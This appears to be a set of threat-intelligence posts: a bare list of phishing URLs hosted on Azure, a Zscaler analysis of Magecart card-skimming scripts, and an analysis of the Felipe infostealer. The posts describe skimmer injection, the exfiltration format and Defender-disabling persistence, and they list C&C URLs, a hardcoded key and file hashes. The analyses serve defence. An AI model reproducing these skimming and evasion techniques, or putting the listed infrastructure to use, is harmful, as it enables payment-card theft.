URLs   IOCs 039282fsd(.)z19(.)web(.)core(.)windows(.)net 3652adua38ea(.)z5(.)web(.)core(.)windows(.)net 378468459jjn(.)z19(.)web(.)core(.)windows(.)net 623623626638885047749469(.)z19(.)web(.)core(.)windows(.)net 86hoi2a8j592hf2(.)z14(.)web(.)core(.)windows(.)net accounhostoutlook(.)z35(.)web(.)core(.)windows(.)net accountsupdate(.)z22(.)web(.)core(.)windows(.)net adobe111(.)z19(.)web(.)core(.)windows(.)net appriver(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net bchwalletblockchain(.)z13(.)web(.)core(.)windows(.)net bitcoinwalletrecovery(.)z13(.)web(.)core(.)windows(.)net blockchainofficesupport(.)z13(.)web(.)core(.)windows(.)net blockchainrecoverywalet(.)z13(.)web(.)core(.)windows(.)net blockchaintradindinvest(.)z13(.)web(.)core(.)windows(.)net businessdrivefilesharing(.)z33(.)web(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net dlgweu(.)blob(.)core(.)windows(.)net driveoffice- secondary(.)z13(.)web(.)core(.)windows(.)net eastexch030serverdatanet(.)z13(.)web(.)core(.)windows(.)net edustudioapp(.)z19(.)web(.)core(.)windows(.)net exchangeonline80293745(.)z27(.)web(.)core(.)windows(.)net finance51(.)z13(.)web(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net fundingmessan(.)z13(.)web(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net h0vbkkkeebweybv(.)z33(.)web(.)core(.)windows(.)net hgnghhghkkdkdh(.)z13(.)web(.)core(.)windows(.)net hp94549754083400j9302975(.)z21(.)web(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net linknec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net linkp4klg1qkni76yoz8(.)z19(.)web(.)core(.)windows(.)net lpdmsonline(.)blob(.)core(.)windows(.)net macrofinancesoftonline(.)z14(.)web(.)core(.)windows(.)net macrosoft0nlineoffice365(.)z13(.)web(.)core(.)windows(.)net mailingofficeupdate(.)z14(.)web(.)core(.)windows(.)net mailofficemicr0softvalid(.)z35(.)web(.)core(.)windows(.)net mailofficesecurity(.)z13(.)web(.)core(.)windows(.)net mailofficeveridiers(.)z33(.)web(.)core(.)windows(.)net mailoutlookmcrosoftupdat(.)z11(.)web(.)core(.)windows(.)net mailoutnewsecurity(.)z14(.)web(.)core(.)windows(.)net mak17opa54vjxu8(.)z7(.)web(.)core(.)windows(.)net mdj34598720843(.)z10(.)web(.)core(.)windows(.)net microexchyz42nhszseheys(.)z13(.)web(.)core(.)windows(.)net micromuze3rlokoyg(.)z14(.)web(.)core(.)windows(.)net microrel00ukelukleqwkoxl(.)z13(.)web(.)core(.)windows(.)net microsofbt50xjotm45wm7al(.)z11(.)web(.)core(.)windows(.)net microsofd8f82gtrjyaajnsj(.)z11(.)web(.)core(.)windows(.)net microsofdi3o152rpnnt2zr8(.)z11(.)web(.)core(.)windows(.)net microsoffn4xwr5df3emnh1m(.)z11(.)web(.)core(.)windows(.)net microsofn642b7o2un27wptm(.)z13(.)web(.)core(.)windows(.)net microsofq2622c5r3wpfsdnp(.)z11(.)web(.)core(.)windows(.)net microsofzwafvh6bisrici50(.)z11(.)web(.)core(.)windows(.)net offic664ghdtsgdyddux(.)z13(.)web(.)core(.)windows(.)net officcee(.)z13(.)web(.)core(.)windows(.)net office365user37773773673(.)z19(.)web(.)core(.)windows(.)net officedelist(.)z13(.)web(.)core(.)windows(.)net officefiledata(.)z13(.)web(.)core(.)windows(.)net onemailofice365(.)z13(.)web(.)core(.)windows(.)net outlookloffice365user23k-secondary(.)z14(.)web(.)core(.)windows(.)net outlookloffice365user25u-secondary(.)z33(.)web(.)core(.)windows(.)net outlookloffice365user65t-secondary(.)z6(.)web(.)core(.)windows(.)net outlookloffice365user65t(.)z6(.)web(.)core(.)windows(.)net outlookloffice365userl6m(.)z13(.)web(.)core(.)windows(.)net outlookofficecom(.)z33(.)web(.)core(.)windows(.)net outlookproctionmail(.)z9(.)web(.)core(.)windows(.)net outwebsignin2094598209(.)z21(.)web(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net pjkiojxyfngsss(.)z13(.)web(.)core(.)windows(.)net pssastd(.)blob(.)core(.)windows(.)net rel00ukelukleqwkoxl(.)z6(.)web(.)core(.)windows(.)net sams2948818388301(.)z13(.)web(.)core(.)windows(.)net secureofficeportal(.)z19(.)web(.)core(.)windows(.)net sharepo7(.)z22(.)web(.)core(.)windows(.)net sharepointewk8xpzoywq7j(.)z19(.)web(.)core(.)windows(.)net supportoffices365(.)z33(.)web(.)core(.)windows(.)net thursday(.)z19(.)web(.)core(.)windows(.)net ttsokaejqumuamreio(.)z6(.)web(.)core(.)windows(.)net under12(.)z19(.)web(.)core(.)windows(.)net user111777999973sdxc(.)z11(.)web(.)core(.)windows(.)net user37377377733(.)z22(.)web(.)core(.)windows(.)net user7779793e792782(.)z14(.)web(.)core(.)windows(.)net user8877773737(.)z11(.)web(.)core(.)windows(.)net usernamewebmailsingin(.)z14(.)web(.)core(.)windows(.)net v83oybtn5zp5mmz(.)z14(.)web(.)core(.)windows(.)net validatnec39cclzg5l591f(.)z19(.)web(.)core(.)windows(.)net voice88(.)z19(.)web(.)core(.)windows(.)net voicserel00ukeluklwkoxl(.)z13(.)web(.)core(.)windows(.)net webusermicr0softtonlinee(.)z33(.)web(.)core(.)windows(.)net were12(.)z19(.)web(.)core(.)windows(.)net weree(.)z6(.)web(.)core(.)windows(.)net wimdowoutlkjxjy0846335f(.)z13(.)web(.)core(.)windows(.)net yamma(.)z13(.)web(.)core(.)windows(.)net zebra11(.)z19(.)web(.)core(.)windows(.)net azaman(.)blob(.)core(.)windows(.)net dlgeus(.)blob(.)core(.)windows(.)net dlgneu(.)blob(.)core(.)windows(.)net fiattt(.)blob(.)core(.)windows(.)net fukshawefwe22(.)blob(.)core(.)windows(.)net gry1asdqw1(.)blob(.)core(.)windows(.)net hsdv(.)blob(.)core(.)windows(.)net parmalat7(.)blob(.)core(.)windows(.)net funksha1(.)blob(.)core(.)windows(.)net

Magecart is a hacker group known for skimming credit or debit card details by injecting malicious JavaScript code into e-commerce sites. Back in September 2018, the Zscaler ThreatLabZ research team published a blog on Magecart activity that analyzed its attack methods and evasion tactics. We are now following up on that blog to report on recent activity we’ve seen and some enhancements in the campaign.   Magecart attack chain In the recent campaign, we noticed a change in the attack chain. One example is the use of heavily obfuscated JavaScript with encrypted data. Also, in some cases, the malicious JavaScript code is now being injected directly in the compromised e-commerce sites, whereas in earlier attacks, the malicious code was injected remotely. Fig 1: Hits of compromised websites in the last three months   1. Injecting heavily obfuscated malicious JavaScript dynamically The below credit card stealer JavaScript payload is dynamically loaded when the victim presses the checkout button after loading the cart. Fig 2: Heavily obfuscated malicious JavaScript code injected on the checkout page   The ThreatLabZ team’s smart crawler with heuristic detection shows that various JavaScript functions are obfuscated in the payload. Fig 3: Crawler’s heuristic detection Fig 4: Malicious script after three levels of deobfuscation by the crawler.   Analysis of the skimming toolkit The above discussed malicious script looks for the keywords “onepage|checkout|onestep|firecheckout” in the URL and, if found, injects another script from hxxps://dnsden[.]biz/a.js. Fig 5: Script injected from hxxps://dnsden[.]biz   The above injected obfuscated script hxxps://dnsden[.]biz/a.js contains encrypted data which is decrypted by the RC4 algorithm in the runtime.   Fig 6: Use of RC4 algorithm in ‘a.js’   The encrypted data in ‘a.js’ script after RC4 decryption ends up injecting the main skimming script, which is responsible for extracting and sending the victim's credit card details back to the attacker. Encrypted data - w5rDvcOKwrnCnsKYcWHCgAcaUsOFVcOQXnZpw48KfjZ/CMObMMOiwq7Cm1XDvFDCl8KBEsKRE8Oyw6krWcK0wo1Xw7J+w6/DknoJasKVScKZOhzCoRI= Decrypted data - The ‘universal.js’ is also obfuscated and has the same encryption algorithm as ‘a.js’. After decryption, it calls a function on the form change event and collects all the payment info entered by the victim. Fig 7: Collecting payment card details Fig 8: Sends victim’s credit card details to C&C   Fig 9: POST request with the stolen credit card details   info=Base64(stolen_data)&hostname=compromised_site&key=random_key Stolen data includes billing and payment details. Fig 10: Decoded stolen data   2. Injecting malicious JavaScript directly in the compromised site   Fig 11: Malicious JavaScript code hosted on the compromised e-commerce site is injected   Fig 12: Malicious JavaScript code hosted on a compromised site for skimming payment card details   Analysis of the skimming toolkit The malicious JavaScript code first checks for the two cookie names “$s” and “$sent”; if these cookies are set, data is stored into variable after decoding. These cookie values are referred to each time any payment card details are being entered, and values are updated if the payment card details are new. Fig 13: Getting values from the two cookie names “$s” and “$sent”   To get payment card details, data from all the tags, such as input, select, and text area, are stored and the script undergoes a basic length check on the card details. Fig 14: Validating length of payment card details   After validating payment card details, a hash of the card details is calculated and checked to determine if the same hash value is available in the data retrieved from the cookie “$sent” earlier. Payment details are dropped if any hash match is found. Fig 15: Checking the hash value of card details against data retrieved earlier from the cookie   Each time any new payment card details are entered, the details are sent to the attacker and the hash value for these details is appended to the cookie value “$sent”;  this cookie value is used to check if the details being entered are new. Fig 16: Value of the cookie “$sent” stored in the victim's browser   On decoding the above Base64 encoded value of the cookie “$sent,” we get the MD5 array of the payment card details. By storing the encrypted payment card details as a cookie, the attacker has added the ability to drop duplicate details being sent to the attacker, as payment details are always checked against the cookie value and only unique card details are sent to the attacker. After all the above checks are encoded, the payment card details are sent to the attacker-controlled site. Fig 17: GET request with the stolen information   In a similar skimming toolkit, along with the above-discussed cookie logic, attackers are injecting fake payment card fields into the compromised site and hiding legitimate fields once the victim selects credit card as the payment method. Fig 18: Fake credit card details field and malicious JavaScript file   Fig 19: HTML code for the fake credit card details fields in the malicious script   Fig 20: Malicious script injecting the fake credit card details fields   Fig 21: Above, injected credit card fields; below, legitimate credit card fields   The injected and legitimate credit card fields look similar, but from the HTML input field attributes (ID and type), there are noticeable differences. In the injected fields, the card number ID is "_ccnumber" and the type is "text," while in a legitimate card number, the ID is "credit-card-number" and the type is "tel."   IOCs dnsden[.]biz jquery-bin[.]com/gate[.]php lumbertrans[.]com/errors/default/gate[.]php luxbagsgirl[.]com/errors/default/gate[.]php jsreload[.]pw/gate[.]php saterday-race[.]com/gate[.]php jqueryextd[.]at/gate[.]php routingzen[.]com/gate[.]php mz-at-shop[.]de/errors/default/gate[.]php 93[.]187[.]129[.]249/gate[.]php developer-js[.]info/gate[.]php google-anaiytic[.]com/fonts[.]googleapis/gate[.]php magento-analytics[.]com/gate[.]php gtows[.]com   Compromised sites shop.triggerbrothers[.]com[.]au custommagnetsdirect[.]com lumbertrans[.]com sunbuggy[.]com saterday-race[.]com windblox[.]com cakedecoratingsolutions[.]com[.]au network-ed[.]com[.]au adooq[.]com mz-at-shop[.]des reddotarms[.]com sprucela[.]com/ t[.]cltradingfl[.]com worldcraftindustries[.]com reallifecatholic[.]com wbminternational[.]com whistlerrides[.]ca/ smartsilk[.]com/ classictruckglass[.]com oconnellsclothing[.]com/skin/ purefruittechnologies[.]com/ cornerstone-arch[.]com minitruckusa[.]com magformers[.]com ravishingcosmetics[.]com alamoshoes[.]com/ salonsavings[.]com/ bathroompanelsuperstore[.]com britishfitness[.]com bumperworksonline[.]com niftyconcept[.]com cornerstone-arch[.]com decorprice[.]com   Conclusion These new developments in an ongoing campaign illustrate some of the ways that attackers are continuously enhancing their methods for stealing sensitive information like login credentials, bank or payment card details, personally identifiable information, and so on. The Magecart campaign has been active for a long time and continues to evolve and hone its techniques to get better at stealing payment card information and related data.  Zscaler ThreatLabZ actively tracks such campaigns and protects customers from these types of attacks.  

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine. The files dropped by malware include: Win XP: %UserProfile%\Local Settings\Temp\vshost.exe %UserProfile%\Local Settings\Temp\explorer32.exe %UserProfile%\Local Settings\Temp\install2.bat %UserProfile%\Local Settings\Temp\infect.txt Win7/Win10: %UserProfile%\AppData\Local\Temp\vshost.exe %UserProfile%\AppData\Local\Temp\explorer32.exe %UserProfile%\AppData\Local\Temp\install2.bat %UserProfile%\AppData\Local\Temp\infect.txt The Felipe Trojan enumerates the system and tries to determine whether it has already been infected by checking the files vshost32.exe and vshost64.exe in the compromised system. The parent file downloads its payloads to %UserProfile%\AppData\Local\Temp\update2804. If this folder already exists, the malware deletes the folder and files inside. Once the folder is deleted, the malware will create a new folder with the same name in hidden mode.   When the update2804 folder is created, the malware downloads its different payloads within a gap of just 50 milliseconds. After downloading the payload, the malware copies it to a special directory temp folder in the system in hidden mode and executes it. First, it will execute the install2.bat file and then it will execute vshost.exe. Below is the code of install2.bat: The batch file will perform registry changes responsible for the following: Run entries for vshost.exe, exolorer32.exe to ensure persistence Disable Windows Defender Bypass UAC control Excluding path of temp folder in Windows Defender Vshost.exe checks the victim's bank cards by checking a card's length or the starting numbers of cards, such as: American Express card: number should begin from 34 or 37 Visa: card length between 13 or 16 Mastercard: card length to be 16 Discover: card length to be 16 and begin from 6011 or 65 Below is a snapshot of some of these instructions: The following is the algorithm to check the card's validity: Process digits from right to left. Double the alternate digit starting from first. Break the alternative digits if addition is greater than 10 (e.g., 28 = 2 + 8 (10) or 19 = 1 + 9 (10)). Return the 10's complement of the total. Finally, it verifies the checksum digit. It will be invalid if the checksum is not modular 10. Snapshot of the algorithm:   If the system is already infected, the malware looks for the filename infect.txt in the temp folder. If it is already there, it sends the below data; otherwise, it sends a request to the C&C to further download the file infect.text. It also sends the victim's system information and writes “infect” in the infect.txt file. The Felipe Trojan gets a memory dump of processes by checking the memory addresses that can store data. Basically, it scans the process memory and, whenever a process starts, the system allocates enough memory for its heap, stack, and regions. However, Windows won't allocate an "entire block" of memory; it tries to allocate any free memory available for the User-Mode. The following are the methods used for the memory dump: GetSystemInfo() Retrieves random information about the system in a structure called SYSTEM_INFO. This structure also contains two variables: minimumApplicationAddress & maximumApplicationAddress, which store the minimum and the maximum address where the system can allocate memory for User-Mode applications. VirtualQueryEx() This method gets information about a range of memory addresses and returns it into a structure named MEMORY_BASIC_INFORMATION. It tells us the range of a memory chunk that starts from the specified address. ReadProcessMemory() Used to read a number of bytes starting from a specific memory address. OpenProcess() Returns a handle to a specific process; the process must be opened. WriteProcessMemory() Writes data to an area of memory in a specified process. After the memory dump, the malware tries to find the victim's used bank card from memory, and fetches this information to send to the C&C. Below is a snapshot of it: Encryption method for sending data to C&C: The malware uses Triple Data Encryption Standard (3DES) algorithm. The first step is to create a simple wrapper class that encapsulates the 3DES algorithm and stores the encrypted data as a base-64 encoded string. Then, that wrapper is used to securely store private user data in a publicly accessible text file.  The 3DES algorithm provides two-way encryption. It needs the private key string as the wrapper to generate a unique decrypted string. Here, the malware uses "L%f@Y7Boolean4%()F$y" as a private key. For more info: https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/strings/walkthrough-encrypting-and-decrypting-strings   Sending data to the C&C:   The malware uses the free “geoPlugin” web service to determine the victim's system and location information. The following are the services used by the malware from the geoPlugin web service: System IP City Region code Country name Timer Set: The malware sets the time in the program to shut down the system and restart on a specific day. In this example, the time should be between 5:06 a.m. and 6:09 a.m. on Friday, then the system gets shut down. The command to shutdown is: Interaction.Shell("shutdown /r /t 0", AppWinStyle.MinimizedFocus, false, -1); Switches: /r: shut down and then restart the local computer /t: time, in seconds, between the execution of the shutdown command and the actual shutdown or restart AppWinStyle.MinimizedFocus: starts the program minimized and with focus   After the restart, the malware fetches hardware information from the victim's system, including the serial number and running processes. If the “explorer32.exe” process is not found in the running processes, the malware downloads from the C&C and executes it from the temp folder for performing further malicious activities. It uses the GetAsyncKeyState() Win API to query the state of each key on the keyboard. From the return value of GetAsyncKeyState(), it can be determined whether the key is up or down at the time the function is called.   Network communication:   Indicators of Compromise: Filename Md5 vshost.exe 15CE8F849FFF4CC8675900EC838A93F9 down.exe 61B06E49D514F3DC5BE4F4EF08F6B43C explorer32.exe D912771C8CD5720AD835E08EB80A77B6 install2.bat 7D016A3BB29904A6E00161694FC6AB4E Download URLs: 192.99.215[.]95/uploads Inmemory[.]tech